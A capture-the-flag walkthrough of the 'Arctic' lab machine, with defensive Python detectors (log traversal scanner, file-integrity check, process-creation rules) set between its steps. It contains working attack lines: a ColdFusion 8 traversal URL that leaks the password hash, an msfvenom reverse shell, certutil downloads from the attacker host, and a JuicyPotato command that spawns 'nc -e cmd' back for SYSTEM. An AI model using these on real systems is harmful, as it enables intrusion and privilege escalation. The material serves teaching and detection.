Arctic

Enumeration
As usual, we start with an nmap scan to find open ports on the target machine.
The following nmap command scans the whole port range of the target quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.11 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online and skip host discovery.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Wed Jan 12 15:27:38 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.16s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown
# Nmap done at Wed Jan 12 15:30:02 2022 -- 1 IP address (1 host up) scanned in 144.22 seconds
As we see, ports 135, 8500 and 49154 are open. Let's try to obtain more information about the service and version running on those ports. The following command scans those ports in more depth and saves the result into a file:
nmap -sC -sV -p135,8500,49154 10.10.10.11 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Jan 12 15:31:30 2022 as: nmap -sCV -p135,8500,49154 -oN targeted 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.065s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 15:33:47 2022 -- 1 IP address (1 host up) scanned in 137.04 seconds
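A small parser for the normal (-oN) output above, added here as an example and not part of the original writeup: it reads the scan report into records and flags the open ports whose service nmap could not identify (here 8500/tcp, reported as fmtp?) so they can be queued for manual review. The sample text is the targeted scan from this page embedded as a string.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample input: the "targeted" scan output shown on this page, embedded as a string.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.92 scan initiated Wed Jan 12 15:31:30 2022 as: nmap -sCV -p135,8500,49154 -oN targeted 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.065s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One port line of -oN output: "<port>/<proto>  <state>  <service>  [<version...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)
HOST_LINE = re.compile(r"^Nmap scan report for (?P<host>\S+)")


@dataclass
class PortEntry:
    host: str
    port: int
    proto: str
    state: str
    service: str      # service name with any trailing "?" removed
    version: str      # empty when version detection produced nothing
    uncertain: bool   # True when nmap printed "service?" (a guess, not a probe match)


def parse_nmap_normal(text: str) -> List[PortEntry]:
    """Parse nmap -oN output into PortEntry records, one per port line."""
    host = None
    entries = []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group("host")
            continue
        m = PORT_LINE.match(line)
        if m and host is not None:
            service = m.group("service")
            entries.append(PortEntry(
                host=host,
                port=int(m.group("port")),
                proto=m.group("proto"),
                state=m.group("state"),
                service=service.rstrip("?"),
                version=(m.group("version") or "").strip(),
                uncertain=service.endswith("?"),
            ))
    return entries


def open_ports(entries: List[PortEntry]) -> List[int]:
    return sorted(e.port for e in entries if e.state == "open")


def needs_manual_review(entries: List[PortEntry]) -> List[PortEntry]:
    """Open ports where version detection gave no match: these get looked at by hand."""
    return [e for e in entries if e.state == "open" and (e.uncertain or not e.version)]


if __name__ == "__main__":
    parsed = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    print("open:", open_ports(parsed))
    for e in needs_manual_review(parsed):
        print(f"review {e.host}:{e.port}/{e.proto} ({e.service})")
```

Run against a directory of -oN files, the same records can be diffed between scans to spot ports that appeared since the last baseline.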
Nmap is not sure what service is running on port 8500. If we open the port in a browser, we find a web server with directory listing enabled.

If we take a look at the CFIDE/ directory, we will find the Administrator/ directory, which shows us a login page.


Exploitation
Now we know we are facing an Adobe ColdFusion 8 login page. Let's search exploit-db for known exploits.
I found a Directory Traversal exploit which points at the following URL.
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Let's check it out.

And we get a password hash. Let's make use of rainbow tables and try to find out the password.
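A defender-side check for the request pattern used above, added as an example that is not from the original writeup: it parses web server access-log lines in combined log format, percent-decodes each query parameter (twice, to catch double encoding) and flags values containing ../ segments or an embedded null byte. The log lines, client IPs and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (combined log format); IPs and timestamps are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2022:15:40:01 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120
10.0.0.7 - - [12/Jan/2022:15:40:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 1843
10.0.0.7 - - [12/Jan/2022:15:40:15 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2f..%2f..%2fColdFusion8%2flib%2fpassword.properties%2500en HTTP/1.1" 200 1843
10.0.0.9 - - [12/Jan/2022:15:41:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# A ".." path segment bounded by a slash of either kind, or by the start/end of the value
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_layers(value: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly so double-encoded payloads (%252e, %2500) are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_reasons(url: str) -> list:
    """Return the sorted list of reasons a request URL looks like a traversal attempt."""
    reasons = set()
    parts = urlsplit(url)
    candidates = [decode_layers(parts.path)]
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        candidates.append(decode_layers(value))   # parse_qsl already removed one encoding layer
    for text in candidates:
        if TRAVERSAL.search(text):
            reasons.add("path-traversal")
        if "\x00" in text:
            reasons.add("null-byte")
    return sorted(reasons)


def scan_access_log(text: str) -> list:
    """One finding per log line whose request URL triggers at least one reason."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = suspicious_reasons(m.group("url"))
        if reasons:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "url": m.group("url"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["time"], f["ip"], ",".join(f["reasons"]), f["url"])
```

Both the plain and the double-encoded request are caught because matching happens on the decoded value rather than on the raw log text; matching on the raw line would miss the second one.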

And we get a password! Let's log in to the administrator login page.

At this point, to get a shell, we will have to create a Scheduled Task which downloads a reverse shell from our machine and stores it in the CFIDE/ directory.
First, we have to find the path where CFIDE/ is stored on the victim machine. If we look closely at the left panel, which has a lot of administrative tools, we will find the Mappings section.

Now we know where the /CFIDE directory is located on the victim machine. Before creating the Scheduled Task, let's create the reverse shell file.
msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.9 lport=4444 -o shell.jsp
-p: indicates the type of payload.
lhost: local host IP.
lport: local port of the listener.
-o: save the output to a file.
And we start a Python HTTP server, which listens on port 8000 by default.
python -m SimpleHTTPServer
Now it's time to create the Scheduled Task. We will have to click on Scheduled Tasks > Schedule New Task. Next, we give the task a name, set the URL to the shell.jsp file hosted on our machine, indicate the absolute path of the output file, which will be C:\ColdFusion8\wwwroot\CFIDE\shell.jsp, and hit Submit.

To run the Scheduled Task, let's click on the green button; we should then see a GET request arrive at the Python HTTP server.

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.11 - - [24/Jan/2022 16:55:51] "GET /shell.jsp HTTP/1.1" 200 -
If we now check the /CFIDE directory, we will see the shell.jsp file.
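Since the foothold here is a new .jsp file written into the web root by a scheduled task, a file-integrity baseline of the web root is the natural detection. The following is an added example, not code from the original page: it snapshots a directory tree by SHA-256, diffs it against a saved baseline, and singles out added or modified files with server-executable extensions. The directory layout is a constructed stand-in for C:\ColdFusion8\wwwroot, and the extension list is an assumption.

```python
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List

# Assumed set of extensions the application server will execute if they land in the web root.
WEB_EXECUTABLE = {".jsp", ".jspx", ".cfm", ".cfml", ".cfc", ".war", ".class"}


def hash_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root) -> Dict[str, str]:
    """Map every file under root (relative, forward-slash path) to its SHA-256."""
    root = Path(root)
    return {
        str(p.relative_to(root)).replace(os.sep, "/"): hash_file(p)
        for p in root.rglob("*") if p.is_file()
    }


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Added / modified / removed paths between two snapshots."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
        "removed": sorted(set(baseline) - set(current)),
    }


def high_risk(changes: Dict[str, List[str]]) -> List[str]:
    """Changed files the server would execute: these warrant an immediate look."""
    return sorted(p for p in changes["added"] + changes["modified"]
                  if Path(p).suffix.lower() in WEB_EXECUTABLE)


def demo():
    # Constructed web-root layout in a temporary directory, modelled on wwwroot\CFIDE from the page.
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "CFIDE" / "administrator").mkdir(parents=True)
        (root / "CFIDE" / "administrator" / "enter.cfm").write_text("<!--- login page --->")
        (root / "CFIDE" / "index.htm").write_text("<html></html>")
        baseline = snapshot(root)            # what a scheduled integrity job would have stored

        # Simulate what the scheduled task did: a new .jsp appears (placeholder content, not a payload),
        # and an existing static file is edited.
        (root / "CFIDE" / "shell.jsp").write_text("<%-- constructed placeholder --%>")
        (root / "CFIDE" / "index.htm").write_text("<html>changed</html>")

        changes = diff_snapshots(baseline, snapshot(root))
        return changes, high_risk(changes)


if __name__ == "__main__":
    changes, risky = demo()
    print(changes)
    print("high risk:", risky)
```

In practice the baseline would be written after each legitimate deployment and the comparison run on a schedule; the fact that ColdFusion's own scheduler can write into its own web root is exactly why the web root deserves this kind of monitoring.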

Before activating it, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
If we now click on the shell link, we should get a reverse shell as the user tolis, and we can grab the user flag.
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49506
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>type \users\tolis\desktop\user.txt
type \users\tolis\desktop\user.txt
02650d3a69a70780c302e146a6cb96f3
Privilege Escalation
Let's start by seeing what privileges the user tolis has.
whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
To escalate privileges, we'll have to transfer the JuicyPotato.exe and nc.exe binaries to the victim machine. Let's set a Python HTTP server on the directory where we have those binaries.
python -m SimpleHTTPServer
And download the binaries into the desktop folder of the tolis user.
certutil.exe -f -urlcache -split http://10.10.14.9:8000/JuicyPotato.exe JuicyPotato.exe
certutil.exe -f -urlcache -split http://10.10.14.9:8000/nc.exe nc.exe
Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.
nc -lvnp 5555
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
Finally, let's run the JuicyPotato binary and get a shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.
JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\users\tolis\desktop\nc.exe -e cmd 10.10.14.9 5555"
-t: CreateProcess call to use (* tries both).
-l: COM server listen port.
-p: program to launch.
-a: command arguments for that program.
listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.11] 49645
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\users\administrator\desktop\root.txt
type C:\users\administrator\desktop\root.txt
ce65ceee66b2b5ebaff07e50508ffb90
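The certutil download above and the JuicyPotato command that launches nc.exe are both visible in process-creation telemetry (Sysmon event ID 1 or equivalent). As an added example that is not part of the original writeup, the following evaluates a few constructed process-creation events against three rules: certutil used with -urlcache and a URL, netcat started with -e, and a command shell whose parent is a web or application server process. The event records, the field names and the parent-process list are assumptions made for the example.

```python
import ntpath
from typing import Dict, List, Tuple

# Constructed process-creation events modelled on Sysmon event 1 fields; values are made up for the example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "User": "arctic\\tolis", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -f -urlcache -split http://10.10.14.9:8000/JuicyPotato.exe JuicyPotato.exe"},
    {"id": "2", "User": "arctic\\admin", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -verify server.cer"},
    {"id": "3", "User": "arctic\\tolis", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\users\\tolis\\desktop\\nc.exe",
     "CommandLine": "C:\\users\\tolis\\desktop\\nc.exe -e cmd 10.10.14.9 5555"},
    {"id": "4", "User": "arctic\\tolis", "ParentImage": "C:\\ColdFusion8\\runtime\\bin\\jrun.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
    {"id": "5", "User": "arctic\\admin", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

# Assumed list of web/application-server images: a shell spawned by one of these is rarely legitimate.
WEB_SERVER_PARENTS = {"jrun.exe", "coldfusion.exe", "w3wp.exe", "httpd.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
NETCAT_IMAGES = {"nc.exe", "nc64.exe", "ncat.exe"}


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def switches(cmdline: str) -> List[str]:
    """Lower-cased tokens with leading '-' or '/' removed, so -urlcache and /urlcache compare equal."""
    return [t.lower().lstrip("-/") for t in cmdline.split()]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list when benign)."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    toks = switches(cmd)
    hits = []
    # Rule 1: certutil fetching a remote file (LOLBin download).
    if image == "certutil.exe" and "urlcache" in toks and any(t.startswith(("http://", "https://")) for t in toks):
        hits.append("certutil-download")
    # Rule 2: netcat with -e, i.e. a program bound to the connection.
    if image in NETCAT_IMAGES and "-e" in cmd.lower().split():
        hits.append("netcat-reverse-shell")
    # Rule 3: an interactive shell whose parent is the application server itself.
    if image in SHELLS and parent in WEB_SERVER_PARENTS:
        hits.append("webserver-spawned-shell")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(event id, matched rules) for every event that matched at least one rule."""
    results = []
    for e in events:
        hits = evaluate(e)
        if hits:
            results.append((e["id"], hits))
    return results


if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS):
        print(event_id, ", ".join(rules))
```

Rule 3 is the one that would have fired first in this chain: the initial reverse shell's prompt sits in C:\ColdFusion8\runtime\bin, so cmd.exe is a child of the ColdFusion service process, which a normal administrator session never produces.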